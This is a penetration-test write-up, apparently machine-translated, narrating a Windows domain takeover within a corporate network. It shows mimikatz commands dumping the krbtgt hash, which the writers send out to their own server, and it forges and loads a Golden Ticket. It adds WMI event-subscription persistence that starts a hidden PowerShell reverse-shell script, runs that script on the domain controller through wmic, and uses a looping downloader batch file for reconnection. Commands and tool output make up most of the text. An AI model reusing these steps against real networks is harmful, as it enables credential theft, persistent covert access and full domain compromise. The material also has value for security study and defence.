Corporate Smartphone Security (C) - Aim at domain controllers and look for Golden Ticket

Corporate Smartphone Security (C) - Aim at domain controllers and look for Golden Ticket. Before leaving the internal network, we decided to get the hash of the domain controller, especially the Kerberos account (krbtgt) and wanted to create a Golden Ticket *.

Golden Ticket refers to the forged TGT (Ticket Granting Ticket). Similarly, the Silver Ticket is a forged TGS (Ticket Granting Server)

Golden Ticket attacks allow us to create an offline Kerberos TGT for unauthorized access and fake any domain user. In addition, it is valid for ten years, in other words as long as it is created, even if the domain administrator's credentials have changed. This is an excellent case of rights maintenance, is not it?

In order to accomplish this task, we need:

krbtgt hash

Domain SID

User name (Administrator here)

Domain name (here SUPERCOMPANY)

In a similar fashion (Port Forwarding on SRVWSUS, Improved SMBExec, etc.), we now have Powershell with a new local administrator privilege on the domain controller.

We executed the obfuscated mimikatz to get the Active Directory for the data and save them in hash.txt:

invoke-mymy -command 'privilege :: debug' LSADump :: LSA / inject ''> hash.txt

The mimikatz script was without the auto-invoke command at the end of the file. We exfiltrated the hash file to our web server. This was its content:

RID: 000001f6 (502)

User: krbtgt

* Primary

LM:

NTLM: 3003567af268a4aXXXXXXXXXXXXXXXXX

Using get-addomain cmdlet, which is automatically imported on Domain Controllers, we got the domain SID:

PS C: \ test> get-addomain

AllowedDNSSuffixes: {}

ChildDomains: {}

ComputersContainer: CN = Computers, DC = supercompany, DC = local

DeletedObjectsContainer: CN = Deleted Objects, DC = supercompany, DC = local

DistinguishedName: DC = supercompany, DC = local

DNSRoot: supercompany.local

DomainControllersContainer: OU = Domain

Controllers, DC = supercompany, DC = local

DomainMode: Windows2012R2Domain

DomainSID: S-1-5-21-3534665177-2148510708-2241433719

...

Note: We can get the domain SID from the admin (uid = 500) obtained from mimikatz:

S-1-5-21-3534665177-2148510708-2241433719-500

Now it's time to create our Golden Ticket

invoke-mymy -command '"privilege :: debug" "Kerberos :: golden / admin: Administrator /domain:supercompany.LOCAL / sid: S-1-5-21-3534665177-2148510708-2241433719 / krbtgt: 3003567af268a4a94e26f410e84353f1 / ticket: admin.krb

. #####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14

. ## ^ ##. "A La Vie, A L'Amour"

## / \ ## / * * *

## / / ## Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)

'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)

'#####' with 20 modules * * * /

mimikatz (powershell) # privilege :: debug

Privilege '20' OK

mimikatz (powershell) # Kerberos :: golden / admin: Administrator /domain:supercompany.LOCAL / sid: S-1-5-21-3534665177-2148510708-2241433719 / krbtgt: 3003567af268a4a94e26f410e84353f1 /ticket:admin.krb

User: Administrator

Domain: supercompany.LOCAL (SUPERCOMPANY)

SID: S-1-5-21-3534665177-2148510708-2241433719

User Id: 500

Groups Id: * 513 512 520 518 519

ServiceKey: 3003567af268a4a94e26f410e84353f1 - rc4_hmac_nt

Lifetime: 2/17/2017 4:02:10 PM; 2/17/2027 4:02:10 PM; 3/3/2027 4:02:10 PM

-> Ticket: admin.krb

* PAC generated

* PAC signed

EncTicketPart generated

* EncTicketPart encrypted

* KrbCred generated

Finally, the Ticket saved to the file just fine, after which, we pick out the admin.krb file, will be used later.

Permission to maintain

Before leaving the system, we have to set up a way to maintain server access to the public network for later use. At this step, not being discovered is not easy, even a novice system administrator will find some clues.

We have chosen a more sophisticated approach to opportunity WMI features, utilizing InstanceModificationEvent.

When a WMI object instance changes its register, it is treated as an InstanceModificationEvent. Under such conditions, we filter the event system startup time, and within 200 to 300 seconds of system startup we will provide a commandlineeventconsumer for the eventconsumer.

On SRVWSUS this server, we sent the following command:

$ filterName = "JustForTestFilter"

$ consumerName = "JustForTestConsumer"

$ exePath = "C: \ windows \ help \ windows \ indexstore \ r.bat"

$ Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime> = 200 AND TargetInstance.SystemUpTime

$ WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root \ subscription" -Arguments @ {Name = $ filterName; EventNameSpace = "root \ cimv2"; QueryLanguage = "WQL"; Query = $ Query} -ErrorAction Stop

$ WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root \ subscription" -Arguments @ {Name = $ consumerName; ExecutablePath = $ exePath; CommandLineTemplate = $ exepath}

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root \ subscription" -Arguments @ {Filter = $ WMIEventFilter; Consumer = $ WMIEventConsumer}

Then windows hidden folder, created r.bat, reads as follows:

powershell -executionpolicy bypass -windowstyle hidden -f C: \ windows \ help \ windows \ indexstore \ r.ps1

The content of the r.ps1 file is:

$ c = New-Object System.Net.Sockets.TCPClient ('', 443);

$ s = $ c.GetStream (); [byte []] $ b = 0..65535 |% {0};

while (($ i = $ s.Read ($ b, 0, $ b.Length)) - ne 0) {;

$ d = (New-Object -TypeName System.Text.ASCIIEncoding) .GetString ($ b, 0, $ i);

$ sb = (IEX $ data 2> & 1 | Out-String);

$ sb2 = $ sb + 'PS' + (pwd) .Path + '>';

$ sb = ([text.encoding] :: ASCII) .GetBytes ($ sb2);

$ s.Write ($ sb, 0, $ sb.Length);

$ s.Flush ()};

$ c.Close () "

This will guarantee a remote shell that performs local SYSTEM permissions through SRVWSUS on reboot.

Finally, we tested the Golden Ticket we got and remembered the file admin.krb?

With the SRVWSUS local system administrator privilege shell, we downloaded admin.krb, configured port forwarding, and uploaded the script r3.ps1 with the connectback command to port 9000 of SRVWSUS.

Now we load Ticket in the session:

PS C: \ tmp> Invoke-mymy -command '"kerberos :: ptt admin.krb"'

. #####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14

. ## ^ ##. "A La Vie, A L'Amour"

## / \ ## / * * *

## / / ## Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)

'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)

'#####' with 20 modules * * * /

mimikatz (powershell) # kerberos :: ptt admin.krb

* File: 'admin.krb': OK

Using klist it is possible to list our loaded Kerberos tokens:

PS C: \ tmp> klist

Current LogonId is 0: 0x3e7

Cached Tickets: (1)

# 0> Client: Administrator @ supercompany.LOCAL

Server: krbtgt / supercompany.LOCAL @ supercompany.LOCAL

KerbTicket Encryption Type: RSADSI RC4-HMAC (NT)

Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent

Start Time: 2/17/2017 1:02:10 (local)

End Time: 2/17/2027 1:02:10 (local)

Renew Time: 2/18/2027 1:02:10 (local)

Session Key Type: RSADSI RC4-HMAC (NT)

Cache Flags: 0x1 -> PRIMARY

Kdc Called:

Success, Ticket successfully loaded!

For the next operation, we use the Windows wmic.exe utility, a WMI command-line interface program that allows remote systems to be accessed through Kerberos credentials.

We copied r3.ps1 on the domain controller, there was no problem, just load the admin's Ticket into our session!

PS C: \ tmp> copy c: \ tmp \ r3.ps1 \\ SRVDC1 \ C $ \ windows \ temp \ r3.ps1 "

Then run:

PS C: \ tmp> wmic / authority: "kerberos: SUPERCOMPANY \ SRVDC1" / node: SRVDC1 process call create "powershell -executionpolicy bypass -windowstyle hidden -fc: \ windows \ temp \ r3.ps1"

Executing (Win32_Process) -> Create ()

Method execution successful.

Out Parameters:

instance of __PARAMETERS

{

ProcessId = 4528;

ReturnValue = 0;

};

We waited and waited for a while before we saw the shell from SRVDC1 on our computer:

PS C: \ Windows \ system32> whoami

supercompany \ administrator

This will work even if the Administrator's password has changed.

On the potential dangers of Golden Ticket, I have a few words to say:

It is very difficult to find fake Kerberos Tickets (https://adsecurity.org/?p=1515)

The only way to do this is to reset the krbtg password twice, but this may have a serious impact on the Active Directory Infrastructure

Last to do

Remember how we got the first powershell remote shell on SRVWSUS?

We ran a remote command from the intranet server to forward the connection via Meterpreter for Android phones. What if we lose Powershell's remote shell and never connect to the victim? Game Over ...

We need to add persistent access to the SRVWSUS shell!

How to do it? The answer is by adding access to SRVWSUS features from Tomcat's webshell:

# 1st smbexec command:

IEX (New-Object Net.WebClient) .DownloadFile (`'http: /// r1.ps1`',

`c: \ tmp \ r1.ps1` ')

# 2nd smbexec command:

IEX (New-Object Net.WebClient) .DownloadFile (`'http: /// r1.bat`',

`c: \ tmp \ r1.bat` ')

# 3rd smbexec command:

'cmd /cc:\tmp\r1.bat'

What does r1.bat contain?

@echo off

: loop

powershell -executionpolicy bypass -windowstyle hidden -fc: \ tmp \ r.ps1

timeout / t 10

goto loop

Although not elegant, but effective. Once the connection is lost, wait ten seconds to reconnect.

Of course we can encrypt and obfuscate all .ps1 scripts, but we just wanted to show you how it works.

in conclusion

This is our job and did not invent anything new, but we did something big with Windows built-in features and some scripting. Sometimes we do not need any magic tools, just KISS principle.